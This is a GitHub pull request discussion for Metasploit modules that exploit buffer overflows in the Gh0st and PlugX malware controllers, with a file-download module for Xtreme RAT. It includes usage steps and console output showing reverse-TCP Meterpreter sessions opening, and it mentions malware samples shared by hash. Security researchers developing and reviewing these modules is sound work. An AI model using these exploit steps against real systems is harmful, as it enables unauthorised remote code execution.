Gh0st, plugx, Controller Buffer Overflow Modules

[Professor-plum]

This PR contains 2 exploits for different malware controllers.
This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. This vulnerability can allow remote code execution

Verification

• test gh0st
• test plugx

Sample output for gh0st:

msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(gh0st) > exploit

[*] Started reverse TCP handler on 192.168.161.1:4444 
[*] 192.168.161.128:80 - Trying target Gh0st Beta 3.6
[*] 192.168.161.128:80 - Spraying heap...
[*] 192.168.161.128:80 - Trying command 103...
[*] Sending stage (957487 bytes) to 192.168.161.128
[*] Meterpreter session 1 opened (192.168.161.1:4444 -> 192.168.161.128:49161) at 2017-07-29 10:11:4

Historical Notes

This also originally included xtreme rat, which was removed for a rewrite into a diff PR.

• test xtreme

[bcoles]

Is this meant to be #{target['Ver']} rather than {target['Ver']}, like line 56 ?

[Professor-plum]

Yes, I'm actually surprised it works without this. Updated

[bcoles]

TARGETFILE should probably be true rather than false as a target file is required.

[bcoles]

self.class isn't required

[bcoles]

self.class isn't required

[bcoles]

self.class isn't required

[bcoles]

It might be nice to notify the user where the file was saved.

store_loot returns the file path, so you can do something like:

path = store_loot(...)
print_good("File saved in: #{path}")

[Professor-plum]

I've made the suggested improvements in my fork, thank you.

[h00die]

Do you have access to samples for all 3 of these?
I don't mind testing on my VMs, but need copies of the code first. This would also be a good thing to capture in docs

[Professor-plum]

Yes, I do. Please see attached
Xtreme RAT 3.7.zip
9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6.zip -> plugx
0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip -> gh0st

[h00die]

@bcoles do you wanna take this one? My schedule has freed up some, so I wouldn't mind doing these.

[bcoles]

All yours @h00die

[h00die]

@Professor-plum what is the password for Xtreme Rat zip? I tried 'infected' as is the industry standard, but no luck.

[h00die]

@Professor-plum i'll also note that typically you want to submit 1 module per pull request. So in this case you'd want to submit 3. It makes things go quicker and easier so if 1 module had an issue, the others could land while we fix up the other. In this case though since @bcoles already gave everything a once over, we'll just keep going.

[h00die]

gh0st working for me against xp sp3:

msf > use exploit/windows/misc/gh0st 
msf exploit(gh0st) > show options

Module options (exploit/windows/misc/gh0st):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   MAGIC  Gh0st            yes       the 5 char magic used by the server
   RHOST                   yes       The target address
   RPORT  80               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Gh0st Beta 3.6


msf exploit(gh0st) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(gh0st) > exploit

[*] Started reverse TCP handler on 1.2.3.4:4444 
[*] 1.2.3.1:80 - Trying target Gh0st Beta 3.6
[*] 1.2.3.1.108:80 - Spraying heap...
[*] 1.2.3.1:80 - Trying command 103...
[*] Sending stage (956991 bytes) to 1.2.3.1
[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 1.2.3.1:1303) at 2017-08-26 16:53:58 -0400
[*] 1.2.3.1:80 - Server closed connection

meterpreter >

[h00die]

I'm getting no luck on PlugX Type II. It shows "waiting for response", and the target pops up a box that says "OnSocketPacket". No shell. Then I get an access violation crash. Unfortunately since all 3 exploits are shoved in one PR, you didn't show an example run of this, and there are no docs included so I'm not sure if its operator error on my part or not. Please advise.

[h00die]

Cleaned up the title and description of your request.

You should also add docs to the pull request. There are many examples, but see https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/diskboss_get_bof.md . There is a template here: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md
This will also help get your PR done quicker. For instance, on plugX my assumption is the default port is correct since it crashes the program. However, i see you can set up additional listeners (although i can't seem to get them to start). Maybe it's failing because I didn't make a listener? Not sure, docs can help answer some of these questions. It'll also be a good place to document where those zip files are, and the password for the xtreme zip which I'm not sure of.

[h00die]

@Professor-plum waiting on the following:

1. password for xtreme zip
2. details on plugx not working, if you know the issue
3. documentation on all modules

Just want to check in to make sure you are still around and not ditching this

[Professor-plum]

Sorry, I meant to get to this today but time escaped me. I'm not sure what is wrong with the zip, infected should be the password. I'm attaching another copy, this time no password.

The plugX sample isn't for the default target type so you'll need to set target 1 for that sample.

I tried documenting each module on the commit comments for each, per the format requested. I'm attaching that documentation below for convenience.
Xtreme RAT 3.7.zip

PlugX

This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.

Verification

Run the PlugX C2 server on a target windows machine. The sample 9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6 is a Plux Type 1 server that works good for testing.

• use exploit/windows/misc/plugx
• set RHOST [ip of target]
• set target 1
• exploit
• acknowledge the "PeDecodePacket" message on the target

Sample output:

msf> use exploit/windows/misc/plugx 
msf exploit(plugx) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(plugx) > set target 1
target => 1
msf exploit(plugx) > check

[*] 192.168.161.128:13579 - "\x03\xB0\x02\x00\x04\x00"
[*] 192.168.161.128:13579 The target appears to be vulnerable.
msf exploit(plugx) >

Xtreme RAT

This module is a Xtreme Rat Server Remote File Download Exploit that allows for blind file retrieval from the target

Verification

Run the Xtreme Rat server on a target windows machine.

• use exploit/windows/misc/xtreme
• set RHOST [ip of target]
• set TARGETFILE testfile.txt
• exploit

Sample output:

msf> use exploit/windows/misc/xtreme
msf exploit(plugx) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(plugx) > set target 1
TARGETFILE => testfile.txt
[*] 192.168.161.128:80 - Trying target Xtreme RAT 3.7...

[h00die]

plugx working. I swear i tried changing the target, but who knows.

msf > use exploit/windows/misc/plugx 
msf exploit(plugx) > set rhost 1.2.3.4
rhost => 1.2.3.4
msf exploit(plugx) > set target 1
target => 1
msf exploit(plugx) > set verbose true
verbose => true
msf exploit(plugx) > show options

Module options (exploit/windows/misc/plugx):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  1.2.3.4    yes       The target address
   RPORT  13579            yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   1   PlugX Type I


msf exploit(plugx) > exploit

[*] Started reverse TCP handler on 1.2.3.99:4444 
[*] 1.2.3.4:13579 - Trying target PlugX Type I...
[*] 1.2.3.4:13579 - waiting for response
[*] Sending stage (956991 bytes) to 1.2.3.4
[*] Meterpreter session 1 opened (1.2.3.99:4444 -> 1.2.3.4:1975) at 2017-09-04 19:53:07 -0400
[*] 1.2.3.4:13579 - Server closed connection

meterpreter > getuid
Server username: WINXP\user

[h00die]

No go on Xtreme RAT (but it unzipped and ran).

msf exploit(xtreme) > set targetfile user.info
targetfile => user.info
msf exploit(xtreme) > set verbose true
verbose => true
msf exploit(xtreme) > exploit

[*] Started reverse TCP handler on 1.2.3.99:4444 
[*] 1.2.3.4:80 - Trying target Xtreme RAT 3.7...
[-] 1.2.3.4:80 - Exploit failed: Zlib::BufError buffer error
[*] Exploit completed, but no session was created.
msf exploit(xtreme) > set target 1
target => 1
msf exploit(xtreme) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Xtreme RAT 3.6
   1   Xtreme RAT 3.7


msf exploit(xtreme) > exploit

[*] Started reverse TCP handler on 1.2.3.99:4444 
[*] 1.2.3.4:80 - Trying target Xtreme RAT 3.7...
[-] 1.2.3.4:80 - Exploit failed: Zlib::BufError buffer error
[*] Exploit completed, but no session was created.

The other issue is its a file downloader, if it doesn't give a shell it needs to be moved to the auxiliary folders.

[h00die]

For future reference, you'll also want to use a different branch than master for your own fork.

[h00die]

xtreme is going to need a slight re-write to be in aux.
I'm going to send you over a pull request that will remove it, and add the docs. If you merge it, it'll update the PR here, and i'll accept.
Then I would recommend making a new pull request with xtreme re-written as an aux module. This way you get your other 2 modules landed and note held up waiting.
working on a pr to you now.

[h00die]

Release Notes

The Gh0st Client buffer Overflow module has been added to the framework. It targets the malware Gh0st controller, as well as PlugX controlle, to result in remote code execution.

[h00die]

@Professor-plum congrats on landing your first 2 modules to the framework! Thank you for your contributions. Hopefully we'll see a new PR for the aux module with xtreme. If you have questions, you can always jump on IRC to ask for help!